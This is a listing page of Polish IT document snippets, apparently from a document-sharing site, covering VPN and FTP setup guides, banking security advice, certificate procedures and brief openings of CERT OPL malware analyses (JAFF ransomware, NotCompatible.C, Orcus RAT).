Oprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony: Aby móc korzystać z bazy publikacji elektronicznych należy: 1) posiadać konto w usłudze LDAP (konto logowania do Internetu), 2) zainstalować i skonfigurować oprogramowanie OpenVPN na swoim komputerze,

Bardziej szczegółowo

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen?

FAQ Systemu EKOS. 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? 27.06.11 FAQ Systemu EKOS 1. Jakie są wymagania techniczne dla stanowiska wprowadzania ocen? Procedura rejestracji ocen wymaga podpisywania protokołów (w postaci wypełnionych formularzy InfoPath Forms

Bardziej szczegółowo

Protokół HTTP (2) I) Wprowadzenie. II) Użyte narzędzia: III) Kolejność działań

Protokół HTTP (2) I) Wprowadzenie. II) Użyte narzędzia: III) Kolejność działań Protokół HTTP (2) I) Wprowadzenie Celem ćwiczenia jest zapoznanie z protokołem HTTP. Ćwiczenie obejmuje takie zagadnienia jak: a) instalację i konfigurację serwera HTTP (Apache2), b) uwierzytelnianie dostępu

Bardziej szczegółowo

Raport z analizy porównawczej rodzin ransomware JAFF i Cry

Raport z analizy porównawczej rodzin ransomware JAFF i Cry Warszawa, 17.07.2017 Raport z analizy porównawczej rodzin ransomware JAFF i Cry CERT OPL, Analiza JAFF; Autor: Tomasz Sałaciński Strona 1 z 6 Próbka Analizowana próbka to moduł PE32 o następujących skrótach

Bardziej szczegółowo

Instrukcja instalacji nos niko w USB w bankowos ci Alior Banku

Instrukcja instalacji nos niko w USB w bankowos ci Alior Banku Instrukcja instalacji nos niko w USB w bankowos ci Alior Banku Nośnik USB służy do przechowywania klucza elektronicznego, używanego do logowania i autoryzacji transakcji. Opcja dostępna jest wyłącznie

Bardziej szczegółowo

Wykorzystanie pamięci USB jako serwera Samba

Wykorzystanie pamięci USB jako serwera Samba 1. Ustawienia komputera 2. Podłączenie dysku USB 3. Ustawienia routera Vigor 3.1. Ustawienia ogólne 3.1. Konta użytkowników 4. Połączenie z serwerem plików 4.1. Odnajdywanie serwera plików 4.1.1. \\lokalny_adres_ip_routera

Bardziej szczegółowo

Instrukcja użytkownika

Instrukcja użytkownika Instrukcja użytkownika Menadżer Licencji Wersja 2013.2.1 Spis treści 1 WPROWADZENIE... 3 2 AKTUALIZACJA SERWISU KLUCZA HASP ORAZ ZDALNEGO SERWISU KLUCZA... 3 3 INSTALACJA... 3 4 MONITOR MENADŻERA LICENCJI...

Bardziej szczegółowo

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ

ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 1 do Część II SIWZ SPIS

Bardziej szczegółowo

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie

Bardziej szczegółowo

Zasady bezpiecznego korzystania z bankowości elektronicznej

Zasady bezpiecznego korzystania z bankowości elektronicznej Zasady bezpiecznego korzystania z bankowości elektronicznej 1. Zawsze sprawdzaj na stronie logowania bankowości elektronicznej aktualne zasady bezpiecznego korzystania z bankowości elektronicznej. 2. Szczegółowe

Bardziej szczegółowo

POLITECHNIKA POZNAŃSKA

POLITECHNIKA POZNAŃSKA POLITECHNIKA POZNAŃSKA CENTRUM ZARZĄDZANIA SIECIĄ KOMPUTEROWĄ Dostęp bezprzewodowy do Uczelnianej Sieci Komputerowej Politechniki Poznańskiej Instrukcja dla studentów Politechniki Poznańskiej wersja 2008081401

Bardziej szczegółowo

e-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU

e-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU Wprowadzenie 1 e-audytor v.3.x INSTRUKCJA INSTALACJI I URUCHOMIENIA SYSTEMU W celu wyłączenia automatycznego QuickStartu należy z poziomu econsole w menu: Narzędzia > Konfiguracja > e-console w Konfiguracji

Bardziej szczegółowo

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp.

Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. T: Konfiguracja usługi ftp w systemie Windows 8.1. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu ftp. FTP (ang. File Transfer Protocol) protokół transferu plików umożliwiający

Bardziej szczegółowo

"Procedura obsługi certyfikatów dla KDPW_TR (U2A)"

Procedura obsługi certyfikatów dla KDPW_TR (U2A) "Procedura obsługi certyfikatów dla KDPW_TR (U2A)" Wersja 1.0 Spis treści Dostęp do Repozytorium transakcji KDPW_TR w trybie U2A... 3 Wymagania systemowe... 4 Wniosek certyfikacyjny... 5 Status zgłoszenia

Bardziej szczegółowo

Skrócona instrukcja obsługi systemu VPN w Szkole Głównej Handlowej w Warszawie

Skrócona instrukcja obsługi systemu VPN w Szkole Głównej Handlowej w Warszawie Skrócona instrukcja obsługi systemu VPN w Szkole Głównej Handlowej w Warszawie ver. 1.2 (2015.04.24) Wprowadzenie VPN to skrót od nazwy Virtual Personal Network (Wirtualna Sieć Prywatna) umożliwiająca

Bardziej szczegółowo

Projektowanie bezpieczeństwa sieci i serwerów

Projektowanie bezpieczeństwa sieci i serwerów Projektowanie bezpieczeństwa sieci i serwerów Konfiguracja zabezpieczeń stacji roboczej 1. Strefy bezpieczeństwa przeglądarki Internet Explorer. W programie Internet Explorer można skonfigurować ustawienia

Bardziej szczegółowo

Usługi sieciowe systemu Linux

Usługi sieciowe systemu Linux Usługi sieciowe systemu Linux 1. Serwer WWW Najpopularniejszym serwerem WWW jest Apache, dostępny dla wielu platform i rozprowadzany w pakietach httpd. Serwer Apache bardzo często jest wykorzystywany do

Bardziej szczegółowo

Instrukcja instalacji aplikacji Comarch Smart Card ToolBox

Instrukcja instalacji aplikacji Comarch Smart Card ToolBox Instrukcja instalacji aplikacji Comarch Smart Card ToolBox dla urządzeń kryptograficznych Bankowość Internetowa R-Online Biznes Spis treści 1. Instalacja aplikacji Comarch Crypto Provider w systemie Windows....

Bardziej szczegółowo

Połączenie VPN aplikacji SSL. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników

Połączenie VPN aplikacji SSL. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników 2. Konfiguracja klienta VPN 2.1. Ustawienia ogólne 2.2. Aplikacja VNC 2.3. Aplikacja

Bardziej szczegółowo

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A

Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Instrukcja do programu Roger Licensing Server v1.0.0 Rev. A Spis treści Spis treści... 2 Wprowadzenie... 3 Przeznaczenie... 3 Moduły... 3 Koncepcja działania... 3 Wymagania... 4 Instalacja... 5 Używanie

Bardziej szczegółowo

Kancelaria Prawna.WEB - POMOC

Kancelaria Prawna.WEB - POMOC Kancelaria Prawna.WEB - POMOC I Kancelaria Prawna.WEB Spis treści Część I Wprowadzenie 1 Część II Wymagania systemowe 1 Część III Instalacja KP.WEB 9 1 Konfiguracja... dostępu do dokumentów 11 Część IV

Bardziej szczegółowo

System Kancelaris. Zdalny dostęp do danych

System Kancelaris. Zdalny dostęp do danych Kancelaris krok po kroku System Kancelaris Zdalny dostęp do danych Data modyfikacji: 2008-07-10 Z czego składaj adają się systemy informatyczne? System Kancelaris składa się z dwóch części: danych oprogramowania,

Bardziej szczegółowo

Instalacja Legalis Intranet

Instalacja Legalis Intranet Instalacja Legalis Intranet Wydawnictwo C.H.Beck 31 października 2006 Spis treści 1 Zarys 2 2 Serwer danych 2 2.1 Wymagania............................ 2 2.2 Instalacja usługi Legalis Serwer.................

Bardziej szczegółowo

PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl

PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl PORADNIK KORZYSTANIA Z SERWERA FTP ftp.architekturaibiznes.com.pl Do połączenia z serwerem A&B w celu załadowania lub pobrania materiałów można wykorzystać dowolny program typu "klient FTP". Jeżeli nie

Bardziej szczegółowo

Wyższa Szkoła Bankowa we Wrocławiu

Wyższa Szkoła Bankowa we Wrocławiu Instrukcja korzystania z oprogramowania firmy Microsoft (subskrypcja DreamSpark Premium), udostępnionego Wyższej Szkole Bankowej we Wrocławiu, w ramach Microsoft IT Academy 1. Uprawnieni studenci Do korzystania

Bardziej szczegółowo

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.

Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,

Bardziej szczegółowo

Sposoby zdalnego sterowania pulpitem

Sposoby zdalnego sterowania pulpitem Karolina Wieczorko, EMiI Sposoby zdalnego sterowania pulpitem Jest wiele opcji zdalnego sterowania pulpitem, począwszy od narzędzi systemowych, poprzez różnego rodzaju programy przez sieć internetową.

Bardziej szczegółowo

Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej)

Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK. I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Windows Server 2008 Standard Str. 1 Ćwiczenia. Opr. JK I. Instalowanie serwera FTP w Windows Server 2008 (zrzuty ekranowe z maszyny wirtualnej) Uruchom maszynę wirtualną Server 2008 Zaloguj się do konta

Bardziej szczegółowo

Instrukcja aplikacji R-Quick

Instrukcja aplikacji R-Quick Instrukcja aplikacji R-Quick Spis treści WYMAGANIA INSTALACYJNE ŚRODOWISKA ADOBE AIR I APLIKACJI R-QUICK... 2 INSTALACJA RĘCZNA ŚRODOWISKA AIR WINDOWS... 3 INSTALACJA RĘCZNA APLIKACJI R-Quick... 6 AUTOMATYCZNY

Bardziej szczegółowo

Aktualizacja dodatku Saba Security Plugin

Aktualizacja dodatku Saba Security Plugin Autor: BT131c Wersja: 1.0 Jan Dziubiński Data: 19.10.2017 Aktualizacja dodatku Saba Security Plugin w przeglądarce Firefox 56 Dokument jest własnością P.I. SABA SERVICE sp. z o.o. Podlega ewidencji i kontroli

Bardziej szczegółowo

Biuletyn techniczny. Drukarki fiskalne w usługach terminalowych. Comarch OPT!MA 17.0. Copyright 2007 COMARCH SA

Biuletyn techniczny. Drukarki fiskalne w usługach terminalowych. Comarch OPT!MA 17.0. Copyright 2007 COMARCH SA Biuletyn techniczny Comarch OPT!MA 17.0 Drukarki fiskalne w usługach terminalowych Copyright 2007 COMARCH SA 1 Spis treści 1 SPIS TREŚCI... 2 2 DRUKARKI FISKALNE W USŁUGACH TERMINALOWYCH... 3 2.1 2.2 INSTALACJA

Bardziej szczegółowo

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych

Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Metodologia ochrony informacji w systemach klasy desktop oraz na urządzeniach przenośnych Krzysztof Młynarski (krzysztof.mlynarski@teleinformatica.com.pl) Teleinformatica Pomimo występowania bardzo wielu

Bardziej szczegółowo

ASEM UBIQUITY PRZEGLĄD FUNKCJONALNOŚCI

ASEM UBIQUITY PRZEGLĄD FUNKCJONALNOŚCI ASEM UBIQUITY PRZEGLĄD FUNKCJONALNOŚCI tel. 22 549 43 53, fax. 22 549 43 50, www.sabur.com.pl, sabur@sabur.com.pl 1/7 ASEM UBIQUITY ASEM Uqiuity to nowatorskie rozwiązanie na platformy Win 32/64 oraz Win

Bardziej szczegółowo

Zamawianie Taxi Instrukcja użytkownika

Zamawianie Taxi Instrukcja użytkownika Zamawianie Taxi Instrukcja użytkownika 2009 Jarek Andrzejewski www.ptja.pl email: ptja@ptja.pl wersja 1.2.1, 22 października 2009 Spis treści 1.Uruchamianie programu...3 2.Pierwsze uruchomienie, aktywacja

Bardziej szczegółowo

Instrukcja postępowania w celu złożenia podpisu elektronicznego na dokumentach składanych do SISC za pośrednictwem portalu PUESC.

Instrukcja postępowania w celu złożenia podpisu elektronicznego na dokumentach składanych do SISC za pośrednictwem portalu PUESC. Instrukcja postępowania w celu złożenia podpisu elektronicznego na dokumentach składanych do SISC za pośrednictwem portalu PUESC. Wersja 1.4 z dnia 17.11.2015 r. ul. Świętokrzyska 12, 00-916 Warszawa tel.:

Bardziej szczegółowo

Instrukcja obsługi VPN w Szkole Gło wnej Handlowej w Warszawie

Instrukcja obsługi VPN w Szkole Gło wnej Handlowej w Warszawie Instrukcja obsługi VPN w Szkole Gło wnej Handlowej w Warszawie Dariusz Jaruga. ver. 1.1 (19-01-2011) Wprowadzenie VPN to skrót od nazwy Virtual Personal Network (Wirtualna Sieć Prywatna) umożliwiająca

Bardziej szczegółowo

Aplikacja npodpis do obsługi certyfikatu

Aplikacja npodpis do obsługi certyfikatu BANK SPÓŁDZIELCZY w Koninie Aplikacja npodpis do obsługi certyfikatu (instrukcja użytkownika) Wersja 06 https://www.bskonin.pl I. Słownik pojęć dalej zwana aplikacją; Internet Banking dla Firm dalej zwany

Bardziej szczegółowo

DESlock+ szybki start

DESlock+ szybki start DESlock+ szybki start Wersja centralnie zarządzana Wersja bez centralnej administracji standalone WAŻNE! Pamiętaj, że jeśli chcesz korzystać z centralnego zarządzania koniecznie zacznij od instalacji serwera

Bardziej szczegółowo

Brinet sp. z o.o. wyłączny przedstawiciel DrayTek w Polsce www.brinet.pl www.draytek.pl

Brinet sp. z o.o. wyłączny przedstawiciel DrayTek w Polsce www.brinet.pl www.draytek.pl 1. Firmware Upgrade Utility 1.1. Metoda 1 (standardowa) 1.2. Metoda 2 (niestandardowa) 2. Serwer FTP 2.1. Lokalny serwer FTP 2.2. Zdalny serwer FTP 3. Upgrade przez Web Procedury aktualizacji zostały oparte

Bardziej szczegółowo

Wymagania do zdalnej instalacji agentów firmy StorageCraft

Wymagania do zdalnej instalacji agentów firmy StorageCraft Wymagania do zdalnej instalacji agentów firmy StorageCraft Sytuacja Te wymagania są rekomendowane do zrealizowania przed wykonaniem zdalnej instalacji agentów ShadowProtect. Pomogą one także rozwiązad

Bardziej szczegółowo

UNIFON podręcznik użytkownika

UNIFON podręcznik użytkownika UNIFON podręcznik użytkownika Spis treści: Instrukcja obsługi programu Unifon...2 Instalacja aplikacji Unifon...3 Korzystanie z aplikacji Unifon...6 Test zakończony sukcesem...9 Test zakończony niepowodzeniem...14

Bardziej szczegółowo

Bezpieczeństwo systemu ebanknet w Banku Spółdzielczym w Brańsku

Bezpieczeństwo systemu ebanknet w Banku Spółdzielczym w Brańsku Bezpieczeństwo systemu ebanknet w Banku Spółdzielczym w Brańsku System bankowości elektronicznej ebanknet został stworzony w oparciu o technologię i doświadczenie znanej firmy informatycznej - lidera wśród

Bardziej szczegółowo

KORZYSTANIE Z BAZY DANYCH UpToDate

KORZYSTANIE Z BAZY DANYCH UpToDate KORZYSTANIE Z BAZY DANYCH UpToDate 1 KORZYSTANIE Z BAZY DANYCH UpToDate 1. Wejdź na stronę Biblioteki Głównej Uniwersytetu Medycznego w Lublinie: http://www.biblioteka.umlub.pl 2. W ZASOBY kliknij na Zdalny

Bardziej szczegółowo

I. WSTĘP... 2 II. WYMAGANIA SYSTEMOWE... 2 III. DOSTĘP DO REPOZYTORIUM TRANSAKCJI... 2

I. WSTĘP... 2 II. WYMAGANIA SYSTEMOWE... 2 III. DOSTĘP DO REPOZYTORIUM TRANSAKCJI... 2 Procedura obsługi certyfikatów KDPW_TR U2A Spis treści I. WSTĘP... 2 II. WYMAGANIA SYSTEMOWE... 2 III. DOSTĘP DO REPOZYTORIUM TRANSAKCJI... 2 IV. OBSŁUGA WNIOSKU CERTYFIKACYJNEGO... 2 IV.1. Złożenie wniosku

Bardziej szczegółowo

Analiza Trojana NotCompatible.C

Analiza Trojana NotCompatible.C Analiza Trojana NotCompatible.C Warszawa 2014-12-23 CERT OPL Malware Analysis Strona 1 z 11 1. Wstęp Pierwszy raz malware o nazwie NotCompatible został wykryty w 2012 roku. Na początku kod używany był

Bardziej szczegółowo

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.

Bardziej szczegółowo

Logowanie do aplikacji TETA Web. Instrukcja Użytkownika

Logowanie do aplikacji TETA Web. Instrukcja Użytkownika Logowanie do aplikacji TETA Web Instrukcja Użytkownika Spis treści 1 Wstęp... 2 1.1 O tym dokumencie... 2 1.2 Przyjęte oznaczenia... 2 1.3 Cel i zakres systemu... 2 1.4 Instalacja wtyczki Silverlight...

Bardziej szczegółowo

Rok szkolny 2015/16 Sylwester Gieszczyk. Wymagania edukacyjne w technikum

Rok szkolny 2015/16 Sylwester Gieszczyk. Wymagania edukacyjne w technikum Lp. 1 Temat 1. Konfigurowanie urządzeń. Uzyskiwanie dostępu do sieci Internet 2 3 4 5 Symulatory programów konfiguracyjnych urządzeń Konfigurowanie urządzeń Konfigurowanie urządzeń sieci Funkcje zarządzalnych

Bardziej szczegółowo

do podstawowych zasad bezpieczeństwa:

do podstawowych zasad bezpieczeństwa: Korzystając z internetowego systemu I-Bank należy się stosować do podstawowych zasad bezpieczeństwa: 1. Należy korzystać z legalnego oprogramowania i regularnie je aktualizować. Na komputerze, na którym

Bardziej szczegółowo

Analiza aktywności złośliwego oprogramowania Orcus RAT

Analiza aktywności złośliwego oprogramowania Orcus RAT Analiza aktywności złośliwego oprogramowania Orcus RAT CERT OPL, Analiza Orcus RAT; Autor: Iwo Graj Strona 1 z 50 Remote Access Tool znany pod nazwą Orcus to jedna z popularniejszych w ostatnim czasie

Bardziej szczegółowo

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy

Bardziej szczegółowo

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk:

Wymagania techniczne dla programów antywirusowych. Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość 450 sztuk: Nr Sprawy KP- 42 /2006 Załącznik nr 1 Do Specyfikacji Istotnych Warunków Zamówienia Wymagania techniczne dla programów antywirusowych Oprogramowanie dla serwerów i stacji roboczych będących w sieci - ilość

Bardziej szczegółowo

Licencja SEE Electrical Free

Licencja SEE Electrical Free Instrukcja Instalacji Licencja SEE Electrical Free V7R2 COPYRIGHT 2013 Wszelkie prawa zastrzeżone COPYRIGHT sierpień 2016 IGE+XAO Polska Wszelkie prawa zastrzeżone. Nieautoryzowane rozpowszechnianie całości

Bardziej szczegółowo

Instrukcja obsługi programu CMS Dla rejestratorów HANBANG

Instrukcja obsługi programu CMS Dla rejestratorów HANBANG Instrukcja obsługi programu CMS Dla rejestratorów HANBANG 1. Wymagania sprzętowe: Minimalne wymagania sprzętowe: System operacyjny: Windows Serwer 2003 Standard Edition SP2 Baza danych: Mysql5.0 Procesor:

Bardziej szczegółowo

Zdalne logowanie do serwerów

Zdalne logowanie do serwerów Zdalne logowanie Zdalne logowanie do serwerów Zdalne logowanie do serwerów - cd Logowanie do serwera inne podejście Sesje w sieci informatycznej Sesje w sieci informatycznej - cd Sesje w sieci informatycznej

Bardziej szczegółowo

BEZPIECZEŃSTWO BANKOWOŚCI DETALICZNEJ

BEZPIECZEŃSTWO BANKOWOŚCI DETALICZNEJ BEZPIECZEŃSTWO BANKOWOŚCI DETALICZNEJ Zachowania użytkownika, a ryzyko wykonywania operacji finansowych przez Internet. Bankowość elektroniczna jest wygodną i bezpieczną formą korzystania z usług bankowych,

Bardziej szczegółowo

Otwock dn r. Do wszystkich Wykonawców

Otwock dn r. Do wszystkich Wykonawców Otwock dn. 03.08.2017 r. Do wszystkich Wykonawców Dotyczy zapytania ofertowego na Dostawę systemu/oprogramowania zapewniającego ochronę antywirusową i antymalware ową sieci komputerowej SP ZOZ Szpitala

Bardziej szczegółowo